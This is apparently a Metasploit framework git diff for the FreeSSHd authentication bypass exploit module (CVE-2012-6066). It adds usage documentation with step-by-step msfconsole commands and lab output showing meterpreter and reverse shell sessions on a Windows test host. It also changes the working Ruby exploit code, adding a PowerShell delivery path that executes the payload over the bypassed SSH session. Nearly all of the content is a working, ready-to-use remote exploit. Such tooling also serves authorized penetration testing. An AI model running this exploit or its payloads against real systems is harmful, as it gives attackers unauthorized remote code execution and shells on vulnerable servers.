diff --git a/documentation/modules/exploit/windows/ssh/freesshd_authbypass.md b/documentation/modules/exploit/windows/ssh/freesshd_authbypass.md new file mode 100644 index 0000000000..aa84d1a30d --- /dev/null +++ b/documentation/modules/exploit/windows/ssh/freesshd_authbypass.md @@ -0,0 +1,92 @@ +## Description + +This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication. + + +## Verification + + 1. Start msfconsole + 2. Do : `use exploit/windows/ssh/freesshd_authbypass` + 3. Do : `set RHOST [target IP]` + 4. Do : `set PAYLOAD [valid windows payload]` if you want to use other payloads (`windows/meterpreter/reverse_tcp` by default) + 5. Do : `set LHOST [Your IP]` + 6. Do : `set LPORT [valid port]` (port is `4444` by default) + 7. Do : `exploit` + 8. If target is vulnerable, a shell (`meterpreter` by default) should pop + +## Example with default payload (windows/meterpreter/reverse_tcp) +``` +msf > use exploit/windows/ssh/freesshd_authbypass +msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131 +RHOST => 192.168.80.131 +msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138 +LHOST => 192.168.80.138 +msf exploit(windows/ssh/freesshd_authbypass) > exploit + +[*] Started reverse TCP handler on 192.168.80.138:4444 +[*] 192.168.80.131:22 - Trying username '4Dgifts' +[*] 192.168.80.131:22 - Trying username 'EZsetup' +[*] 192.168.80.131:22 - Trying username 'OutOfBox' +[*] 192.168.80.131:22 - Trying username 'ROOT' +[*] Sending stage (179779 bytes) to 192.168.80.131 +[*] Meterpreter session 2 opened (192.168.80.138:4444 -> 192.168.80.131:49166) at 2018-11-16 16:10:33 +0800 + +meterpreter > sysinfo +Computer : SSH-TEST-SERVER +OS : Windows 8.1 (Build 9600). +Architecture : x86 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 1 +Meterpreter : x86/windows +meterpreter > + +``` + +## Example with plain old reverse shell (windows/shell_reverse_tcp) +``` +msf > use exploit/windows/ssh/freesshd_authbypass +msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131 +RHOST => 192.168.80.131 +msf exploit(windows/ssh/freesshd_authbypass) > set PAYLOAD windows/shell_reverse_tcp +PAYLOAD => windows/shell_reverse_tcp +msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138 +LHOST => 192.168.80.138 +msf exploit(windows/ssh/freesshd_authbypass) > set LPORT 4444 +LPORT => 4444 +msf exploit(windows/ssh/freesshd_authbypass) > exploit + +[*] Started reverse TCP handler on 192.168.80.138:4444 +[*] 192.168.80.131:22 - Trying username '4Dgifts' +[*] 192.168.80.131:22 - Trying username 'EZsetup' +[*] 192.168.80.131:22 - Trying username 'OutOfBox' +[*] 192.168.80.131:22 - Trying username 'ROOT' +[*] Command shell session 1 opened (192.168.80.138:4444 -> 192.168.80.131:49167) at 2018-11-16 16:12:19 +0800 + + + +C:\Windows\system32>ipconfig +ipconfig + +Windows IP Configuration + + +Ethernet adapter Ethernet0: + + Connection-specific DNS Suffix . : localdomain + Link-local IPv6 Address . . . . . : fe80::5d22:f345:9ea1:a320%3 + IPv4 Address. . . . . . . . . . . : 192.168.80.131 + Subnet Mask . . . . . . . . . . . : 255.255.255.0 + Default Gateway . . . . . . . . . : + +Tunnel adapter isatap.localdomain: + + Media State . . . . . . . . . . . : Media disconnected + Connection-specific DNS Suffix . : localdomain + +C:\Windows\system32>hostname +hostname +SSH-TEST-SERVER + +C:\Windows\system32> +``` diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index 5062cf0103..98420d2405 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -3,10 +3,13 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +require 'msf/core/exploit/powershell' + class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Powershell include Msf::Exploit::CmdStager def initialize(info = {}) @@ -15,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => "Freesshd Authentication Bypass", 'Description' => %q{ - This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass + This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication. }, @@ -24,24 +27,26 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Aris', # Vulnerability discovery and Exploit 'kcope', # 2012 Exploit - 'Daniele Martini ' # Metasploit module + 'Daniele Martini ', # Metasploit module + 'Imran E. Dawoodjee (minor improvements)' # minor improvements ], 'References' => [ - [ 'CVE', '2012-6066' ], - [ 'OSVDB', '88006' ], - [ 'BID', '56785' ], - [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ], - [ 'URL', 'https://seclists.org/fulldisclosure/2010/Aug/132' ] + ['CVE', '2012-6066'], + ['OSVDB', '88006'], + ['BID', '56785'], + ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'], + ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132'] ], 'Platform' => 'win', 'Privileged' => true, - 'DisclosureDate' => "Aug 11 2010", - 'Targets' => + 'Targets' => [ - [ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ] + ['PowerShell', {}], + ['CmdStager upload', {}] ], - 'DefaultTarget' => 0 + 'DefaultTarget' => 0, + 'DisclosureDate' => "Aug 11 2010" ) ) @@ -68,7 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote disconnect if banner.match?(/SSH\-2\.0\-WeOnlyDo/) version = banner.split(" ")[1] - return Exploit::CheckCode::Appears if version.match?(/(2\.1\.3|2\.0\.6)/) + return Exploit::CheckCode::Vulnerable if version.match?(/(2\.1\.3|2\.0\.6)/) + return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe @@ -80,13 +86,13 @@ class MetasploitModule < Msf::Exploit::Remote def setup_ssh_options { - :password => rand_text_alpha(8), - :port => datastore['RPORT'], - :timeout => 1, - :proxies => datastore['Proxies'], - :key_data => OpenSSL::PKey::RSA.new(2048).to_pem, - :auth_methods => ['publickey'], - :verify_host_key => :never + password: rand_text_alpha(8), + port: datastore['RPORT'], + timeout: 1, + proxies: datastore['Proxies'], + key_data: OpenSSL::PKey::RSA.new(2048).to_pem, + auth_methods: ['publickey'], + verify_host_key: :never } end @@ -133,19 +139,31 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit + unless [CheckCode::Vulnerable].include? check + fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!' + end + options = setup_ssh_options @connection = nil each_user do |username| next if username.empty? + @connection = do_login(username, options) break if @connection end if @connection - print_status("Uploading payload, this may take several minutes...") - execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700) + case target.name + when 'PowerShell' + print_status('Executing payload via Powershell...') + psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) + @connection.exec!("cmd.exe /c " + psh_command) + when 'CmdStager upload' + print_status("Uploading payload, this may take several minutes...") + execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700) + end end end end